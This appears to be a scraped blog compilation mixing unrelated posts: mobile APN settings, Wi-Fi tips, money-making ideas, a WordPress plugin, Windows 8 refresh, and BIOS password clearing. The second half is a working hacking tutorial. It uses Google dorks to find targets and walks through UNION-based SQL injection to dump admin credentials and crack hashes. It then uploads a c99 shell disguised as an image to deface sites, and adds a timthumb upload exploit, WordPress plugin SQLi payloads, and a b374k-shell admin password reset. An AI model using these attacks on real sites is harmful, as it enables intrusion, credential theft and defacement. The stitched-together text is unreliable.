Setting Accesspoint.

                        1.Accesspoint Name:    PLEASEHACK
                        2.Apn:    gpmms

                               Option > Advanced Settings

                         3.Proxy Server:

                         4.Port: 8080 And Save It

                                 DOWNLOAD ANY OPERA:

OupengBrowser v6.7.29868 for s60v3-v5-s^3 update 5.05.2013.sis
Size: 1.03 MB

5 ways to speed up and improve your wireless network

First off I need to mention that I live in an apartment complex, and getting wireless to work properly is extremely hard, and I guess I can say that I've learnt a lot form tweaking it so much. Recently I read a similar article on Microsoft's website, but most of the stuff in there is impractical. All they seem to say is upgrade all your devices and buy more stuff. So here are 5 tips that are guaranteed to make your wireless connection work better for free. These "tweaks" can be performed in most settings and it shouldn't be a much of a problem to implement in your home or even office network. Make sure you secure your wireless network too though.
  1. Find the right channel for your router. First make sure that you don't have any cordless phone in your own house that might be causing interference. If you find that your wireless connection gets weaker whenever you get a call, try changing the channel on your cordless phone. Then download net stumbler on one of your computers with a wireless card (it should work with most cards). Open it and check what channel other people are broadcasting on. People will usually be using either channel 1, 6 or 11, so try to stay away from these channels, but you never know. Then change your router's channel to some other channel no one else is using. You'll need to know how to work with the router configuration page to do this.Keep in mind though that other people might have cordless phones running on the same channel which might interfere with the your signal, so you'll have to use the trial and error method to find the perfect channel.
  2. Switch to OpenDNS. Although this tip is more of a improve your "Internet speed" tip, its still good for getting better speeds through your wireless network. And since most people use their wireless network for Internet, I recommend replacing your ISP's dns service with OpenDNS. Instructions on how to configure your router to use OpenDNS can be found on their website. Basically its just copying and pasting a couple of IP addresses, so I won't mention how to do that here.
  3. Move your router. Yes, although this is pretty self explanatory, most people ignore this tip. Try to move your router to a central location in your home. Although this might be kind of hard, since you're bound by the location of your high speed modem, phone line or even your cable line, its not always impossible. You don't have to move the router from one room to another, just moving it from one side to another side of the room should suffice. All you need to do is get 2 long pieces of Ethernet cable, it doesn't matter which kind since most routers have "wire management" so it'll accept any kind of cat-5 crossover, rollover or straight through cable and use that instead of short cables. This will enable you to move your router so that it is a bit more closer to the center of your home or closer to your laptop if you only use a laptop.
  4. Change your wireless card settings. Most wireless cards are configured to the default settings of using wireless QoS and so on, so you'll want to tweak it to make it interface faster with the network. To start tweaking first press the Windows + Pause Break key if you are on Windows > Go to the hard ware tab > Click on Device Manager > Under Network Adaptors double click on your wireless and go to the Advanced tab. Here's what you can tweak on most cards:
    • Mixed more protection - Use CTS-to-self. This will make the speed faster since you are in a small home network
    • Power Management - Use the highest value, because this will make your card work faster. You might want to choose a medium or low setting if you want extended battery life though.
    • Roaming Aggressiveness - Use either the medium or lowest value in a home setting, so that your card won't keep searching for new connections, it'll just stay happy with the network in your home and won't connect to your neighbour's network.
    • Throughput Enhancement - Make sure you enable throughput enhancement to have the fastest speeds
    • Transmit Power - Use the highest option to connect to your network properly and get the fastest speeds
  5. Update drivers/firmware and maintain your network. Here are a couple of things you should do with your network:
    1. Update your drivers for your wireless card (usually found on the manufacturer's website) and the firmware on your router. Go to the manufacturer's website to get the latest firmware. Instructions on updating your firmware can also be found there.
    2. Give your network a unique SSID and encrypt it! Why? Because your neighbour might be accidentally using your connection and making it slower, or someone might be using your network to download stuff on the Internet... so it is best to give your network a unique SSID and use at least WPA encryption if WPA2 isn't a choice. More instructions on that coming soon...
    3. Make sure to also change the password to the router so that some one else does not modify the setting. I recommend setting a big password so it is impossible to crack.
    4. Make sure your laptop and the router are using the 802.11 (wi-fi) G standard. Sometimes, if your laptop is set to use only wi-fi 802.11 B, even though it supports G, your router will only communicate to it using B, and not G which is way faster.

10 Creative Ways To Make Money Online

Make More Money Online

If you’d claimed it was possible for the average guy on the street to make millions of dollars online just a decade ago, the chances are good you’d have heard nothing but laughter in response. Today, though, there are countless Internet millionaires who turned a great idea into obscene profit, used the power of the web to promote their offline business or simply worked their butt off to sell their skills online.
While it’s unlikely that you’ll ever earn enough to buy your own private island, there’s nothing to stop you from using your skills to make a comfortable living online. In fact, while the media would have you believe that online success stories are limited to just a few lucky, hard working people who stumbled on a great idea that went on to make millions, the reality is that there are tens of thousands of people who make a living exclusively online. Here are just ten ways you can join them.

How To Make Money Online

1. Sell Stock Photography

Sell Stock Photos OnlineThe Internet has caused an explosion in the demand for stock photography. As the number of media and commercial outlets has increased dramatically with the growth of online media there’s an enormous need for high quality stock photos.
Yuri Arcurs is the man everyone turns to for their stock photo needs. As the world’s top selling stock photographer he sells an image every 8 seconds, 24 hours a day (that works out to over 4 million images each year). Arcurs makes millions of dollars each year simply by being the best at what he does. There are lots of great photographers in the world and the barrier to entry is as low as ownership of a camera, but Arcurs has managed to build a reputation online for consistent, high quality and imaginative images.
If you’re a professional photographer (or even just a hobbyist) you should consider the possibilities of selling stock images online.

2. Tweet For Sponsors

Sponsored is an online platform that allows you to make money on Twitter by charging sponsors for communicating their advertising messages to your followers. You set the amount you want to get paid for every tweet you make, choose a category and select keywords you want to work with. You then wait for advertisers to contact you and take you up on your offer, paying you the amount you specified for each tweet that you make.
All throughout the process, the tweeter has full control over his or her account, and may choose the wordings of the tweets, or may choose to reject the tweet altogether.

3. Blog for Ad Revenues

Google Adsense Money OnlineIf, however, you already have a blog with a devoted following it should be easy for you to leverage your readers into hard cash. Ad networks such as Google AdSense pay big money to place their ads on your site, and you’ll receive a payment every time a reader clicks one. While it’s easy to go overboard and fill every spare pixel, if you place your ads well it’s possible to make a comfortable income from your site.
One of the most successful bloggers around today is John Chow, a Canadian blogger who makes more than $40,000 a month through ad sales and other revenue streams. Ironically, his blog is about ways to make money online.

4. Sell Affiliate Products

Affiliate marketing money onlineIf you have a flair for sales copy you could try your hand at selling products for affiliates. While many people take the seedy route of selling diet pills and penis enlargement products, if you want to keep your conscience clear you’ll find that Amazon runs a very successful affiliate program that allows you to make money advertising any of the products for sale on their site. eBay also have a pretty good affiliate setup, with their top affiliates earning $1.3 Million a month, WOW!

5. Write an e Book

make money sell ebook onlineIn recent years the self-publishing world has exploded online to the point at which you don’t even have to run your own site in order to promote a book. Amazon, Barnes & Noble and Kobo are just a few of the sites on which you could self-publish today, with commission rates of around 70% available on every sale.
The number of eBooks on Amazon reached 8 million last year, and Amazon stated that eBooks are outselling hard backs 2 to 1, 62% of ebook sales fell into the Thriller and Mystery genre, so if you feel that you could pull this style of genre off then you will be in for a good chance of sales.
26 year old self published author, Amanda Hocking from Minnesota makes more than $2 Million a year from her ebook sales. Amanda Hocking’s stories about, trolls, vampires and zombies and  ‘supernatural teen romances’ sell for $2.99 or for as little as $.99.

6. Become a Virtual Assistant

Virtual AssistantEvery small businessman would love to hire a full time assistant to take care of the little things, but many simply can’t afford one. Thanks to the Internet, though, they can now hire part time assistants who work for a whole host of clients, and all at a much lower cost than a full time staff member.
If you work from home this may be a perfect opportunity to make a consistent income. Virtual assistants can earn $20 an hour in return for booking travel tickets, interacting with clients and dealing with the daily needs of small businesses.

7. Lease Your Skills

make money online outsourceMost people have at least one skill that carries a market value, though until now that skill may have been impossible to monetize in the traditional job market.
Sites such as 99Designs, Elance, Freelancer and iWriter allow people to hire out their skills as writers, coders, designers, translators and lots more on a contract basis. Freelancing sites are a great way to boost your income in your free time, and with enough motivation and hard work you could find yourself earning a comfortable full time income from them.

8. Selling on eBay

Make Money On eBayeBay is a great way to turn your unwanted things into a little spending money, but it isn’t just a place to sell your old Star Wars action figures. In fact, eBay’s global marketplace can offer a great way for canny traders to buy and sell their way to profit. By buying wholesale you can sell anything with a mark up. Even better, if you have the skills to make things people want to buy you could start your own home-based craft business, selling to customers around the world.
Matt & Amanda Clarkson are a successful couple who so far have managed to make over $8 Million in eBay sales.

9. Become A Mobile App Tester

test iphone appsPeople that are rather uncertain of their application development potential can still make some money through the usage of iPhone apps.
People that have the time and desire to test iPhone apps and discover bugs can be rewarded payments for their efforts. uTest is one such application. Individuals that have signed up will also build some reputation on the basis of the testing they have done so far.
Better reputation signifies access to more profitable app testing opportunities.

10. Designing T-Shirts

design tshirt make moneyFinally, if you have something of an artistic streak you could kick off the next viral sensation with your own range of funky, arty t-shirts. Sites such as CafePress allow users to upload their own t-shirt designs and sell them on their personal online store.
You can also contact distributors such as or to release your t-shirt designs to the masses.
If your designs catch the eye you could be looking at enormous profits when they take off in a big way.
Checkout our article The Top 10 Tips On Starting Your Own Successful Clothing Line, this should give you an idea on how to kick things off.


As you can see, to make money online you don’t have to be particularly skilled with computers. You don’t need to be know how to build your own website from the ground up, and you don’t have to be a mogul with millions of dollars to invest in success. If you have any kind of artistic skills, creativity or business savvy you can turn it into profit.
In short, you should understand that the online world is just like real life. The same opportunities are there for the taking, but instead of drawing your customers from just your home town you can reach out with your great ideas to the far reaches of the earth.
So why not start today?

Make all Post as Category Permalink Wise Word Press Plugin

When you make all your post as category wise in the middle time, you have to take care of the old post because the search engine cached page will go as 404 error. For a solution we have the best plugin witch is make all post without category to with category.

Make all Post as Category Permalink Wise Word Press Plugin

Just install this plugin : Click here to Get Permalink to Category Permalink Plugin
Make all Post as Category Permalink Wise Word Press Plugin
In this plugin there in no option and setting you have to do just install this plugin and It will take care of all your without categorys posts into with categorys.
WordPress has default permalinks as %post title% but the nice option we can make all you posts as permalinks wise because user can easily understand where they are with the permalinks.
In the middle time after you, create many posts in your website. If you plan to change your permalinks as categorys wise, you should use this plugin after changing you permalink as %category% %post title%.
If you don’t redirect all your posts with this plugin after changing the permalink all your posts will go as 404 error for search engine.
It is a great way to redirect all your old without categorys wise posts as with categorys wise.

New Future to reset windows 8 Restore all Setting Refresh Your PC

Discover about the best future in windows eight yes in the newest version of window provide a new future that will make you system like restore default application. That means when you install a fresh Operating system of windows 8 you can get the full windows application interface not your personal application then you can install any application. After installing, many applications if you want to reset you can use this option. It will make the reset process not restore New Future to reset windows 8 Restore all Setting Refresh Your PC.
If your PC got many error and you like to install your Fresh Operating System Here is the best alternative instead of installing new operating system you can use the “PC Refresh” Option that will comes with the Windows 8.
New Future to reset windows 8 Restore all Setting Refresh Your PC

New setting “Refresh Your PC” in windows 8.

  1. Go to Start Menu and Type “Refresh” > Click Setting > Select “Refresh Your PC” in the left side.
After selecting the option this service will automatically reset your pc as new and fresh Operating system installed.
  • The important note make sure with you installed application. Like if, you have installed you additional application that all will be lost with this option.
  • Your PC fully reset with the Operating System. So make double sure with this option.
  • If you rally cannot solve you program error and you got much error from many application you can use this option.
  • You can go thru this option instead of installing New Operating System.
  • In addition, you cannot get your old installed application back you have to install those applications again.

How to Clear BIOS CMOS Password in Desktop Window PC

Know about How to Clear BIOS CMOS Password in Desktop Window PC. Here is a simple’s step to clear your PC CMOS Password without knowing it. In addition, you can fully clear the password with these steps.
Reset Your BIOS CMOS Password with Jumper.
How to Clear BIOS CMOS Password in Desktop Window PC

Here you can cleared you unknown BIOS CMOS Password with Changing Jumper from your Motherboard. This is a recommended method to reset your password.
1. Turn off your computer and open CPU box.
2. Find out the jumper like in the image.
3. There is 1st  and 2nd  lever Jumper like on the image.
4. 1st level is normal mode your PC always in the first level.
5. Now Change the Jumper Fitting in 2nd Level to clear BIOS Password.
6. After changing the jumper into 2nd level, make sure all fitting in your motherboard and Turn on our system.
7. Go to Bios setting and Find the User Password or Admin Password menu now you can get the Additional menu like “Clear All Password” something.
8. Just Enter the Option now your BIOS password clear.
9. Turn off your Computer and Reset the BIOS like before in the 1st level.
That is now your access your computer.

SQL Injection : Finding vulnerability To Defacemnt

SQL Injection : Finding  vulnerability To Defacemnt

How To Hack website With SQL Injection : Full Tutorial
 I'm posting this here coz this tut explains everything step by step. but most of the sql tuts ends when we find the password hash. So newbees dnt know wat to do after that. In this tut i'm gonna explain how to deface a website from scratch hope you fill find this usefull....

If you find this tut usefull please post a comment....


First we must find our target website to do that you can use this "dorks".
I'll give some dorks here copy anyone of it and paste it in google and search.

you can find lots of dorks here..(use them without the " " marks)

1). Check for vulnerability

Let's say that we have some site like this

Now to test if is vulrnable we add to the end of url ' (quote),

and that would be'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulrnable to sql injection

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error. order by 1/* <-- no error order by 2/* <-- no error order by 3/* <-- no error order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works

4). Check for MySQL version union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

i didn't see any paper covering this problem, so i must write it

what we need is convert() function

i.e. union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e. union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good )

we know that table admin exists...

now to check column names. union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice

for that we can use concat() function (it joins strings)

i.e union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : ) union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser

if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie. union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc...

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together

for that we use concat() , i decribe it earlier.

i.e union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.


** if you are too lazy for doing above stuff you can use tools they will do all the job:
1) Exploit scanner (this will find vulnerable websites)
2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)
*** use the tools only if you are new to hacking. Do it manually thats the thrill and that is real hacking. When you do it manually you will understand the concept.

in some websites you can directly see the password. but most of the websites encrypt them using MD5. so u hav to crack the hash to get the password. to crack the password there are three ways
1) check the net whether this hash is cracked before:
2) crack the password with the help of a site:
3) use a MD5 cracking software:
Code: ... .10_2b.rar
Password = OwlsNest


after getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.
1) you can use an admin finder website:
2) you can use an admin finder software:

after logging in as the admin you can upload photos to the site. so now you are going to upload a shell into the site using this upload facility.

dowload the shell here(shells are php scripts which affects websites so it will be detected as trojans but no need to worry i take the responsibility):
extract it you will get a c99.php upload it.
some sites wont allow you to upload a php file. so rename it as c99.php.gif
then upload it.

after that go to (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)
find the c99.php;.gif and click it..
now you can see a big control pannel....
now you can do what ever you want to do...
search for the index.html file and replace it with your own file. so if any one goes to that site they will see your page....

after doing this click logout.... thats it you are done..
if you have any doubts post here.. i'll be allways there for you. if you are there for me...

Wordpress timthumb remote file upload Vulnerability

In this Vulnerability you can include any file (every format allowed)on Vulnerable wrdpress website
this bug known as "timthumb.php" exploit
example :
after acessing this url that file will upload on website remotly on website
to view your uploaded file goto :
(file will upload with a random name like fe0555b78d04cb3c76cff7e10cf05b77, check last file to view your file)
live Demo :
Result :

Wordpress SQL Injection Hacks

images (65×123)

there are Million of  sites which hosted on wordpress.Its new Tutorial on wordpress
hacking with SQL injections, lets see

How To use it ? 
For Example 
1st injection is "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* 
Now Modify it into a Google Dork, For making Dork use "Inurl:injection's php or dire here" for example for this injection dork will be "inurl:wp-content/plugins/st_newsletter/stnl_iframe.php" 
Now Go to and type your modified dork and see the serach result the search result will be like this for dork        Reomve the words after iframe.php and put ur SQl injection here ... 
now the url will be,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--You will got the use name and md5 coded password ... 
Crash the password using md5 decoding Tools and login here 
Note : The Process is same for all Injections is same ..

How To Gain Admin acess on wordpress websites after uploading shell

if you want acess in same site where you uploaded shell then simply edit wp-config.php

wp1.jpg (407×250)

Copy MySQL Database's username and password from wp-config.php
Now Goto MYSQL option in b374k shell 
and paste username and password there

wp2.jpg (456×233)

Now Click on Go
Now you wil get 2 tables There
click on table below information_schema

wp3.jpg (352×124)

click on 2 table and find wp_users columns there
and click on wp_users

wp5.jpg (555×186)

you'll get admin username password and email there,
but its Hard to crack wp password so we need to reset it with own hash !
simply put there password reset Query in Black Box
UPDATE wp_users SET user_pass =md5( '123456') WHERE user_login = 'admin';
and Click On Go
you'll get a Reply 
UPDATE wp_users SET user_pass =md5( '123456') WHERE user_login = 'admin'; [ok]
its means Password chnaged sucessfully !

wp6.jpg (474×175)

Now goto : and login there =)

wp1.jpg (369×358)